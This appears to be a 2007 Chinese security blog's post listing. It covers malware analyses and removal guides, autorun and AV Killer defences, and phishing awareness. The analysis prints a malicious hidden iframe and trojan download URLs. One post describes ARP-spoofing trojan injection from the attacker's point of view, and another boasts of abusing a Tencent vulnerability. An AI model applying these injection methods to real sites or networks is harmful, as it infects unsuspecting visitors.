分类 : 系统安全 | 发表时间 07-08-2007
分类 : 系统安全 | 发表时间 21-07-2007
分析:
File: wniapsvr.exe
Size: 24333 bytes
File Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
MD5: E73C5073E03673880C62683BA24DB798
SHA1: 7A2496CBBD05F3B01D35C1DDC4A12E93D171DD9A
CRC32: 18621B7D
病毒运行后:
文件变化:
释放文件
C:\WINDOWS\system32\wniapsvr.exe
注册服务Visual VSA WEB
服务相关键值
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Type: 0×00000110
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Start: 0×00000002
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ErrorControl: 0×00000000
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ImagePath: "C:\WINDOWS\system32\wniapsvr.exe -Run"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\DisplayName: "Networ VSA"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ObjectName: "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Description: "允许对TCP/IP上NetBios服务以及NetBT名称解析的支持。"
删除C:\WINDOWS\system32\verclsid.exe
启动IE连接网络 222.88.91.80:80下载木马
下载http://web.xxxxxxxxxx.com/web/123.txt到%programfiles%下面
读取里面的木马版本信息
下载木马
http://web.xxxxxxxxxx.com/soft/1.exe
http://web.xxxxxxxxxx.com/soft/2.exe
http://web.xxxxxxxxxx.com/soft/3.exe
http://web.xxxxxxxxxx.com/soft/4.exe
http://web.xxxxxxxxxx.com/soft/5.exe
http://web.xxxxxxxxxx.com/soft/6.exe
http://web.xxxxxxxxxx.com/soft/7.exe
http://web.xxxxxxxxxx.com/soft/8.exe
http://web.xxxxxxxxxx.com/soft/9.exe
http://web.xxxxxxxxxx.com/soft/a.exe
http://web.xxxxxxxxxx.com/soft/b.exe
http://web.xxxxxxxxxx.com/soft/c.exe
http://web.xxxxxxxxxx.com/soft/d.exe
http://web.xxxxxxxxxx.com/soft/e.exe
http://web.xxxxxxxxxx.com/soft/f.exe
http://web.xxxxxxxxxx.com/soft/g.exe
到%program files%下面 分别命名为pro1.exe~pro16.exe
木马植入完毕后
生成如下文件
C:\WINDOWS\system32\AVPSrv.dll
C:\WINDOWS\system32\dhapri.dll
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\system32\MsIMMs32.dll
C:\WINDOWS\system32\netsrvcs.dll
C:\WINDOWS\system32\nslookupi.exe
C:\WINDOWS\system32\ntsokele.exe
C:\WINDOWS\system32\nwizwmgjs.exe
C:\WINDOWS\system32\perefic.ini
C:\WINDOWS\system32\RemoteDbg.dll
C:\WINDOWS\system32\TIMHost.dll
C:\WINDOWS\system32\upxdnd.dll
C:\WINDOWS\system32\windhcp.ocx
C:\WINDOWS\system32\wniapsvr.exe
C:\WINDOWS\AVPSrv.exe
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\MsIMMs32.exe
C:\WINDOWS\TIMHost.exe
C:\WINDOWS\upxdnd.exe
C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
C:\WINDOWS\system32\dhapri.dll
所有分区下生成hide.exe和autorun.inf E盘下面还生成sysauto.exe
sysauto.exe跟C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys有关 是盗号木马
hide.exe与C:\WINDOWS\system32\RemoteDbg.dll有关
值得一提的是C:\WINDOWS\system32\nslookupi.exe这个病毒
他感染所有分区的htm html asp 等网页文件
在其中加入<IFRAME SRC=http://mm.xxxxxx.com/abc.htm width=1 height=1 frameborder=0></IFRAME>的代码
sreng日志中相关项目如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
<AppInit_DLLs><dhapri.dll> []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
<{12311A42-AC1B-158F-FD32-5674345F23A1}><C:\WINDOWS\system32\dhapri.dll> []
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys> []
服务
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
<C:\WINDOWS\system32\ntsokele.exe><N/A>
[Networ VSA / Visual VSA WEB][Stopped/Auto Start]
<C:\WINDOWS\system32\wniapsvr.exe -Run><Microsoft Corporation>
进程
[PID: 1748 / Administrator][C:\WINDOWS\Explorer.EXE] [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
[C:\WINDOWS\system32\dhapri.dll] [N/A, ]
[C:\Program Files\Internet Explorer\PLUGINS\System64.Sys] [N/A, ]
[C:\WINDOWS\system32\upxdnd.dll] [N/A, ]
[C:\WINDOWS\system32\Kvsc3.dll] [N/A, ]
[C:\WINDOWS\system32\AVPSrv.dll] [N/A, ]
[C:\WINDOWS\system32\MsIMMs32.dll] [N/A, ]
[C:\WINDOWS\system32\TIMHost.dll] [N/A, ]
[C:\WINDOWS\system32\nwizwmgjs.dll] [N/A, ]
清除方法:
首先把C:\WINDOWS\system32\dhapri.dll重命名为其他名称
然后重启进入安全模式下
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
<upxdnd><C:\WINDOWS\upxdnd.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<TIMHost><C:\WINDOWS\TIMHost.exe> []
<MsIMMs32><C:\WINDOWS\MsIMMs32.exe> []
<AVPSrv><C:\WINDOWS\AVPSrv.exe> []
<Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe> []
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出
分类 : 系统安全 | 发表时间 21-07-2007
今年以来,有时候,你会发现,当选择“显示隐藏文件”这一选项后,发现U盘有个文件闪出来一下就马上又消失了,而再打开文件夹选项时,发现仍就是“不显示隐藏文件”这一选项。而且刚发现点击C、D等盘符图标时会另外打开一个窗口。
病情描述
1、无法显示隐藏文件;
2、点击C、D等盘符图标时会另外打开一个窗口;
3、用winrar查看时发现C、D等根目录下有autorun.inf和tel.xls.exe两个文件;
4、任务管理器中的应用进程一栏里有个莫明其妙的kill;
5、开机启动项中有莫明其妙的SocksA.exe。
解决办法
以下整个过程中不要双击硬盘分区,需要打开时用鼠标右键—>打开。
一、关闭病毒进程
在任务管理器应用程序里面查找类似kill等你不认识的进程,右键—>转到进程,找到类似SVOHOST.exe(也可能就是某个svchost.exe)的进程,右键—>结束进程树。
二、显示出被隐藏的系统文件
开始运行输入regedit找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\
Advanced\Folder\Hidden\SHOWALL删除CheckedValue键值,单击右键 新建—>Dword值—>命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。
三、删除病毒
在分区盘上单击鼠标右键—>打开,看到每个盘跟目录下有autorun.inf 和tel\.xls\.exe 两个文件,将其删除,U盘同样。
四、删除病毒的自动运行项
开始—>运行—>msconfig—>启动—>删除类似sacksa.exe、SocksA.exe之类项,或者打开注册表运行regedit
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft> Windows>CurrentVersion>Run
删除类似C:\ WINDOWS\system32\SVOHOST.exe 的项。
五、删除遗留文件
C:\ WINDOWS\ 跟 C:\ WINDOWS\system32\ 目录下删除SVOHOST.exe(注意系统有一个类似文件,图标怪异的那个类似excel的图标的是病毒)session.exe、sacaka.exe、SocksA.exe以及所有excel类似图标的文件,每个文件夹两个,自己注意不要误删。重启电脑后,基本可以了。
分类 : 系统安全 | 发表时间 14-07-2007
首先就排除了网站被入侵的可能,因为首页能加在那个位置只能是 title的地方,用js控制也不大可能.然后去看了php.ini的设置也没有任何的异常,而且这个插入的代码有的时候出现有的时候不出现,说明不是网 站的问题了.打开同服务器的其他网站也有这个情况发生,而且状况一一样.检查并且搜索挂马的关键字之后确定不是网站程序的问题.
那么 剩下的要么是IIS自己出了问题,要么是网络的问题,因为数据是处理没有问题(这个由程序输出,而且即使是html都会出问题),经过一个一个排查,最后 基本可以确定就是arp欺骗欺骗数据报走向,然后中间人修改一些定义的关键字.因为是网络层次有问题(所以重做系统是没有用的).
目的:通过arp欺骗来直接挂马
优点:可以直接通过arp欺骗来挂马.
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码
但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.
优点:1.可以不用获得目标主机的权限就可以直接在上面挂马
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.
原理:arp中间人攻击,实际上相当于做了一次代理。
正常时候: A—->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A—->C—->B
B—->C—->A
实际上,C在这里做了一次代理的作用
那 么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>…之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是 正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.
下载的Anti ARP Sniffer V3.6 免费版
*Anti ARP Sniffer V3.6是一款免费的软件,适合于个人用来监测是否存在ARP欺骗,即使整个局域网部署Anti ARP Sniffer 也不能彻底解决ARP攻击问题,请使用彩影网盾保护整个网络。
能查出此服务器区中,另一台有问题的MAC地址,告诉了网管,后来网管把这台服务器网线给剪了。
什么是ARP?
英文原义:Address Resolution Protocol
中文释义:(RFC-826)地址解析协议
局域网中,网络中实际传输的是“帧”,帧里面是有目标主机的MAC地址的。所谓“地址解析”就是主机在发送帧前将目标IP地址转换成目标MAC地址的过程。ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址以保证通信的顺利进行。
注 解:简单地说,ARP协议主要负责将局域网中的32为IP地址转换为对应的48位物理地址,即网卡的MAC地址,比如IP地址为192.168.0.1网 卡MAC地址为00-03-0F-FD-1D-2B。整个转换过程是一台主机先向目标主机发送包含IP地址信息的广播数据包,即ARP请求,然后目标主机 向该主机发送一个含有IP地址和MAC地址数据包,通过MAC地址两个主机就可以实现数据传输了。
应用:在安装了以太网网络适配器 的计算机中都有专门的ARP缓存,包含一个或多个表,用于保存IP地址以及经过解析的MAC地址。在Windows中要查看或者修改ARP缓存中的信息, 可以使用arp命令来完成,比如在Windows XP的命令提示符窗口中键入“arp -a”或“arp -g”可以查看ARP缓存中的内容;键入 “arp -d IPaddress”表示删除指定的IP地址项(IPaddress表示IP地址)。arp命令的其他用法可以键入“arp /?”查看 到。
正常时候: A—->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A—->C—->B
B—->C—->A
实际上,C在这里做了一次代理的作用
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>…之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.
分类 : 系统安全 | 发表时间 11-07-2007
恶意网站特征
如何判断自己是遇到了恶意网站的攻击,症状多种多样:
1. 开机自动登录网站。
2. 启动IE,自动登录网站,无法修复主页设置。
3. IE不断打开窗口。
4. 修改[主页]按钮和[搜索]按钮。
5. 修改右键菜单,甚至屏蔽右键菜单。
6. 更改收藏夹的内容。
7. 安装自动拨号程序。
8. 自动安装木马程序。
9. 自动格式化硬盘或删除某个文件夹中的所有文件。
10. 更新文件关联和锁死EXE程序。
11. 锁死注册表。
解决办法
一、备份
建议使用“超级兔子魔法设置”中的“注册表优化”进行备份,软件能将Classes.dat、System.dat、System.ini、User.dat、Win.ini等文件全部备份下来,上面提到的前五种恶意网站无非就是通过修改这些文件来达到其目的的。
二、弃用IE
大部分的攻击目标都是IE。如果我们用MyIE2(强烈建议使用Ver 0.8.220这一版本)代替IE浏览器,恶意网站就无的放矢了。MyIE2在启动时能够绕开主页直接打开空白页,而且还能保护主页不被修改。如果开机就自动运行IE,要先用超级兔子魔法设置中的“自动运行”功能将网址删除,再用MyIE2代替IE。
注意:这两个功能在默认状态下是关闭的,您要在[选项]→[MyIE2选项]→[常规]中和“启动时”中将其打开。由于MyIE2使用IE的内核,所以请勿删除IE。
三、解救被封死的收藏夹
某些恶意网站会对收藏夹进行修改,大多是通过修改“C:\ Windows/Favorites”中的“Desktop.ini”文件来实现的,所以只要删除这个文件就可以了。如果根本就无法打开“C:\ Windows\Favorites”文件夹,就到DOS下进行删除(要先用“attrib -r -s -h”后才能将其删除)。另外,“收藏夹”中的内容并没有被删除,只是放入了另一个文件夹中,名称和“Favorites”差不多(如“Favorites2”等),如果想恢复原来的“收藏夹”,只要剪切一下就可以了。
如果是将系统默认的“收藏夹”路径设置成指定的目录(如“C:\ Windows\Favorites2”等),只要恢复正常的“注册表”就一切OK了。
四、定期还原正常的注册表
如果遇到安装自动拨号程序的情况,你可要小心啦,小心惊人的国际长话费。对付它,最好是定期还原正常的注册表!这样做虽然不能彻底删除此类恶意程序,但却能让其完全禁止运行,因为这类程序是通过修改注册表来达到随机运行的目的的(只有极少数是在“开始”菜单的“启动”项内做文章),只不过我们无法通过手工删除干净。
这个方法对于自动安装木马程序的情况也同样适用。
五、防止硬盘被格式化
对于自动格式化硬盘的恶意网站,要把“C:\Windows\COMMAND”文件夹中的format.com、Fdisk.exe、Deltree.exe这三个程序文件删除或进行改名,因为这些恶意代码是需要这些程序才能够发挥“威力”的,只要让这些恶意代码找不到它们,您的电脑也就安全了!
六、打开“锁死”的程序
对于被锁死的EXE程序,只要事先已将“C:\Windows”目录下正常的Classes.dat、System.dat、User.dat、System.ini、Win.ini这五个文件备份下来,在“中招”后用正常的文件覆盖一下并重新启动就OK了(注:Windows 95和98中可能没有Classes.dat文件,而且Windows 97以下版本的*作系统用此方法无效!甚至会使整个系统瘫痪。)。如果连复制都被禁止了的话,您可用启动盘到DOS下进行覆盖复制。
七、“防”要胜于“治”
通常恶意网站都披着具有“诱惑力”的外衣,设下诱人的陷阱让您“中招”。所以一定要意志坚强,抵制住诱惑。只要您能做到“任你花言巧语,我自岿然不动”。那么,什么样的陷阱也奈何不了您。
另外,现在有很多恶意网站开始通过即时通讯软件来传播了,比如QQ、ICQ等,方式虽然多种多样,但通常是在对方网友的话后面又发来了一个网站信息,有的会附有一些带有“诱惑性”的话(如:“看看我的样子”等),有的只是一个有着诱人域名的网址,对于这样的网站,原则也同样——就是不上当!
但与此同时,几十个参数会令普通用户头疼,因此笔者不推荐一般用户使用,Symantec公司也应该推出相应的GUI(图形用户界面)控制台以方便用户使用。具体的参数说明可以用命令行gdisk/得到帮助。
分类 : 系统安全 | 发表时间 04-07-2007
from:网络
autorun.inf类病毒和木马相信大家都中过标 一般形式以下载者类木马较为明显 下面ZZ一些方法 希望对大家有用 可以自己测试下
在前面的Make a anti-autorun batch中,我们讨论了如何通过禁止Shell Hardware Detection服务的方式,来屏蔽光盘/优盘插入时候的自动运行,转载到cnbeta之后,也有相当多的讨论,去掉中间没有营养的不说,里面提出了3 点值得注意:
通过rd /s /q,可以直接删除包含带点目录的autorun.inf目录;
通过改名操作,也可以直接对包含带点目录的autorun.inf目录进行重命名;
禁用Shell Hardware Detection,会使得系统无法识别CD/DVD的驱动器类型;
最重要的是,就算禁用了自动运行,大部分的用户,还是因为在我的电脑里面的双击盘符操作,而”手动调用自动执行”,从而感染病毒……OK,今天的主角出场!
参考cnbeta上的cnlong朋友的意见,测试通过,通过注册表编辑器+权限控制,彻底杜绝双击盘符情况下的autorun.inf调用,具体的办法如下:
1.开始——运行——regedit;
2.定位到HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Explorer\MountPoints2;
3.在MountPoints2上右键——权限;
4.添加——输入everyone——检查名称——确定;
5.选择完全控制栏的拒绝,应用,对安全警告回答是;
应该算是比较完美的方案了:经过这样的权限设置,任何情况下的autorun.inf调用将被屏蔽,在默认状态下,带autorun的光盘和优盘被装载的时候,目录会被打开,双击盘符的结果是打开目录,而不是执行程序,同时,右键也不会出现任何形式的自动运行菜单。
分析一下,那个键值应该就是Windows用来记录和管理双击盘符和盘符上的右键菜单的,在里面查找,然后决定执行什么操作,仔细查看的话,你会发现更多的内容。我们把这个键值的操作权限对everyone屏蔽之后,系统无法访问到这个对应表,于是只有打开的操作。
两篇文章里面提到的内容相结合,应该可以彻底的解决自动运行、以及双击盘符带来的染毒问题了,开心!
测试,可用。
点评:
优点:杜绝了autorun运行,防止U盘病毒传播;
缺点:
光盘autorun不起作用了,U3 U盘的autorun也不起作用了。
作者 golds7n
分类 : 系统安全 | 发表时间 04-07-2007
新闻来源:铁军的杀毒博客
继灰鸽子木马宣称退出江湖之后的一段时间内,金山反病毒中心截获的灰鸽子相关病毒,主要是以加壳做免杀为主。上周末,金山反病毒中新截获一重大变化的灰鸽子新变种,证实灰鸽子并未退出江湖,在经过短暂的静默之后,正在图谋收复失地。
新版灰鸽子的主要更新有:
采用进程内容替换技术和双进程互相监视技术,大大提高自我保护的能力;
进程内容替换是指:病毒启动一个Iexplore.exe 进程,然后把该进程的内容替换为病毒进程的内容。从而具备更深的隐藏性。
进程互相监视:病毒此次启动了Iexplre.exe和Calc.exe(计算机)两个进程,并都使用了进程内容替换技术,将这两个进程替换为病毒进程。此时内存中存在两个病毒进程,它们会相互守护,当发一其中任意一个被结束时,未被结束的进程会将其重新启动。
据金山反病毒中心监测的结果,目前该变种感染量还较小,但可能成为AVKiller(AV终结者)之类的木马下载器重点传播的后门程序。也就是说,新版灰鸽子可能会和AV终结者狼狈为奸,对电脑用户造成严重的安全威胁。提醒各位网友,访问http://zhuansha.duba.net/259.shtml 下载AV终结者专杀工具,检查是否遭受“AV终结者”入侵,从而保证杀毒软件处于正常工作状态。
以下是该病毒的详细分析报告:
这是一个Windows平台下的黑客病毒,中毒后,病毒会连接到远程的黑客主机,使用户机器完全受控于黑客。黑客可以查看、下载中毒机器上的任意文件,记录用户所有电脑操作,盗取用户QQ号码、网银等信息等。当用户主机连有摄像头时,黑客甚至可以通过摄像头对用户进行远程监视,造成用户数据、隐私泄露,危害极大。
1、将自身伪装成以下伪系统正常程序:
%systemdir%ssms.exe
系统分区:Program FilesCommon FilesMicrosoft SharedMSInfo_ssms.exe
2、添加如下病毒服务:
服务名: Windows-UP
显示名: Windows-UP_2007_71
服务描述: 系统最新安全补丁自动更新
服务文件:%systemdir%ssms.exe
3、尝试删除QQ的键盘驱动文件npkcrypt.sys。
4、创建两个隐藏进程:%systemdir%calc.exe(系统自带的计算器进程) 和 系统分区:program filesinternet explorerIEXPLORE.EXE(IE进程),将这两个进程的代码替换成自己的病毒代码然后执行,这两个进程会互相守护。
5、病毒发作时,会主动连接病毒作者的控制端,成功连接病毒作者的控制端后,病毒作者能够实时获取用户屏幕内容、实时监视/控制用户摄像头、记录中文聊天记录、查看/下载用户机器上的任意文件、查看/终止用户任意进程,也能够控制被感染机器关机或重启。
网友taylor0577也对该变种作了详细分析,请参考:
http://hi.baidu.com/taylor0577/blog/item/37e79f453325cf3d869473f0.html
分类 : 系统安全 | 发表时间 04-07-2007
其实目前的AV终结者很容易对付的,简单的方法:用一个REG或INF重建IFEO,修复安全模式,清理启动项,清理AUTORUN.INF,重启电脑就可以了!
不过管理员应该提醒大家,记得中了AV终结者时最好拔掉网线,杀完毒后要记得清理流氓软件和查杀木马。
来说说怎么预防AV终结者吧,首先打系统补丁,特别注意:MS06-014和MS07-017这两个补丁。
步骤1:限制IFEO的读写权,达到限制病毒通过IFEO劫持杀毒软件的目的。
开始-运行-regedt32 (这个是系统的32位注册表,和注册表操作方法差不多)然后还是展开到:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File
Execution Options
右键——选择权限,然后把Administrors用户组和Users用户组的权限全部取消。
步骤2:限制SAFEBOOT的读写权,达到限制AV终结者修改或删除Drives,保护安全模式正常运行的目的。
用限制IFEO的方法限制下面值的权限:
HKEY_LOCAL_MACHINE/SYSTEM/ControlSet001
/Control/SafeBoot/Network/{4D36E967-E325-11CE-BFC1-08002BE10318}
和
HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/SafeBoot/Minimal/{4D36
E967-E325-11CE-BFC1-08002BE10318}
如果不经常装程序的朋友,其实启动项的权限都可以限制掉,没有必要留给病毒!
步骤3:关闭WIndows U盘自动运行功能,打开记事本编辑如下:
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer]
"NoDriveTypeAutoRun"=dword:000000B5
[HKEY_USERS/.DEFAULT/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer]
"NoDriveTypeAutoRun"=dword:000000B5
将上另存为文件名:禁止U盘自动运行.reg 保存类型选“所有文件”,然后双击此文件将其导入注册表。
步骤4:对U盘进行防毒处理,大家可以创建一个Autorun.inf文件夹来限制AV终结者在U盘上创建Autorun.inf文件。呵呵!不过现在的AV终结者好像能对付这个Autorun.inf文件夹。
步骤5:改变操作习惯,提高安全意识。
通过5步,我们完全可以让AV终结者远离我们的电脑,也可以完全杜绝所有U盘病毒
分类 : 网络日志 | 发表时间 01-06-2007
Windows XP操作系统,打开“我的电脑”-“工具”-“文件夹选项”,选择“查看”选项页,点击选择“显示所有文件和文件夹”后,无论点击“应用”或者“确定”按钮,都无法显示所有文件,重新打开“文件夹选项”,“查看”选项页中依然为“不显示所有文件和文件夹”,怎么办?
不能勾选“显示所有文件和文件夹”,即便勾选了也不起作用。
显示出被隐藏的系统文件运行——regedit 确定—HKEY_LOCAL_MACHINE"Software"Microsoft"windows"CurrentVersion" explorer"Advanced"Folder"Hidden"SHOWALL,
将CheckedValue键值修改为1
这里要注意,病毒会把本来有效的DWORD值CheckedValue删除掉,新建了一个无效的字符串值CheckedValue,并且把键值改为 0!我们将这个改为1是毫无作用的。(有部分病毒变种会直接把这个CheckedValue给删掉,只需和下面一样,自己再重新建一个就可以了)
方法:删除此CheckedValue键值,单击右键新建——Dword值——命名为CheckedValue,然后修改它的键值为1,这样就可以选择“显示所有隐藏文件”和“显示系统文件”。
在文件夹——工具——文件夹选项中将系统文件和隐藏文件设置为显示
分类 : 技术文摘 | 发表时间 23-05-2007
首先来看,这个地址。开头:h**p://pet.qq.com 是QQ宠物的官方地址没错。不禁产生疑问,赠送6位QQ号码关宠物什么事呢?再看后面,就更奇怪了,后面 **.com ,又来个.com! 还是卖VCD的。
不仅如此,腾讯又在一个另一个站点发布6位QQ号码申请的网页:http://www.qqqqq.cn/qq/(请先不要点击,当然,你非要点它,我也不拦你哈)这个地址就更令人郁闷了,5个Q连在一起,难道腾讯怕别人记不住他吗?
让我们继续来。
进入页面,没有发现病毒(还算幸运)。一大坨6位靓号等你拿!这时忽然觉得上帝终于开始眷顾你了,幸运女神在向你招手,这种艳遇都能碰到!鼠标毫不犹豫的选中那个1开头的号。
问题来了,那个号不是那么容易拿的。要推荐8个人点击它才行。腾讯想得很周到,连广告词儿都替你写好了,就等你直接复制了:
http://qqqqq.cn/qq/Q.htm?1…
免费申请6位数的QQ号啦~点击马上申请
并且还附上:由于现在的QQ病毒很多,当你发网址给网友的时候一定要告诉他们这个不是病毒,不然他们可能怕去打开你的网址。同时本站强烈建议你去论坛发表你的网址,这样很快就会有15个人打开你的网址。
有种此地无银三百两的感觉。而且前面刚说有8人点开就可以拿到了,后面又说要15人点开才行。怎么回事呢?再细想一下,腾讯连我联系地址都没要,怎么给我发号呢??
先不管那么多,打开黑客基地,进入QQ黑客,先发帖赚点击再说…
很不巧,斑竹同志刚好在线,还没1分钟就给删了。并且还被人损了一顿:信这个是SB~
于是,终于知道天下没有免费午餐了。
某天,不知哪个小子发帖说:注册就免费送会员!活动地址是: h**p://sf.17game.com/event/200703_second/newreg.htm心理偷偷的笑,嘿嘿,这样还拿出来骗人~老子才不会再上当了呢!
过了一礼拜,看到别人参加活动都拿到会员了,自己当初明明看到了,却没参加,错失良机!那个后悔啊!正如诗中所云:此恨绵绵无绝期!问君能有几多愁,恰似一江春水向东流!
————————————————————————————————————————————————————
为了一个QQ您大可不必如此费神,辨别是不是腾讯公司开展的活动其实很简单。下面我介绍几种方法。
1、看网址。一定要仔细看,骗子甚至会把www. tenccent.com 拿来冒充官网。既然看出来是假的,就不要点开了。省得IE中毒。谁也不想打魔兽正high的时候突然冒出来一个健康商城的网页吧。
2、验证码。凡是填写QQ号码与密码的地方,都会要求填写验证码的。现在任何需要QQ号码的地方都有验证码,所以已经不存在什么所谓的暴力破解QQ了。
3、看美工。人靠衣装马靠鞍,从一个网站的美工、设计、制作、布局等是可以判断出来真伪的。能仿造出一个一模一样的腾讯主页的那些强人,肯定不会稀罕几个破QQ的,因为人家现在最大的消遣就是没事就坐在炕头上数钱玩~ 我的意思是说,如果是像钓鱼网站、赚点击率这样的网页,做工是很粗糙的。通常只是一个单独的网页,没有其他的网站部门连接。99%有黄色广告。(不要告诉我你是为了那些黄色广告才点开的,那样我会鄙视你的)
4、先下手。目前,腾讯确实出了很多赠QQ秀,Q币,会员,红钻这样的活动,需要我们先登陆QQ。对付这种情况,我们可以先下手为强,先到官网www.qq.com上面登陆,不要退出,直接在地址栏上复制你要去的那个活动地址。如果是真实的活动话,你之前已经登陆,那现在就不必登陆。如果他还要你登陆,那就要小心点了。
5、将计就计。你不是要QQ密码嘛,行,我给你。输入错误的密码,看他怎么说。这个方法比较简单,一下就能辨别出来~ 要是腾讯公司的活动,一定会提示:您输入密码错误。如果不是,那就很难说啦~ 呵呵,恭喜您登陆成功!
6、保护隐私。有些活动是要求你先注册成为会员的,这些内容,不要添写和你QQ上内容一样的。ID 昵称 密码 超级密码 邮箱或者手机 身份证号……全部用假的。(这只是安全起见)防止对方利用这种渠道去申诉你的QQ号。并且不要指望那些莫名其妙的抽奖会寄奖品给你。
7、重视腾讯。这句话,我07年情人节那天深刻体会到了。估计有很多人知道这件事,那天下午,在黑客基地的QQ黑客区爆出07年QQ空间的最大漏洞,所有物品免费用!而且没有过期时间限制!这件事,当时,只有黑基的人知道,大约只有不到100号人参与了。结果,当晚7点时候这个漏洞就被封了。转天,各大论坛陆续得到消息,无奈,只能后悔当初没选择黑基。呵呵。这件事充分说明,腾讯的办事效率是相当高的。人家聘的那一屋子工程师不是吃白饭的。以后在网上看到怎么利用漏洞刷会员这些的,要警惕一下,别忘了告诉自己:腾讯不是白痴。
总结一下:网络很危险,所以要处处小心。把窗户打开,呼吸新鲜空气,同时苍蝇也会飞进来,但请不要把窗户关上,因为你更需要新鲜空气。
腾讯成立这么多年了,已经形成他自己独特的文化。请尊重别人的文化。不要鄙视腾讯。仅06年上半年,腾讯所得税开支为5740万元。人家合法的作人家的买卖,光明正大的赚你腰包里的钱,既没逼你,也没抢你,一切的交易都是你自己愿意往里砸钱的。一边给腾讯送钱,一边大骂老马最黑。这都没有必要。腾讯毕竟还是经常出来免费的东西。拿我的QQ来说吧,红钻,会员,20几件QQ秀,QQ闪装,3D秀都是参加活动赠的,完全免费。QQ空间里的所有物品,是07年情人节那天在斑竹同志的指引下,利用腾讯漏洞刷的。
面对腾讯,我们要冷静对待。静静地想一想,我们付出了什么,又得到了什么?
© All Rights Reserved. 林网博客
Powered by : Wordpress | Designed by : WebDesignLessons.com |
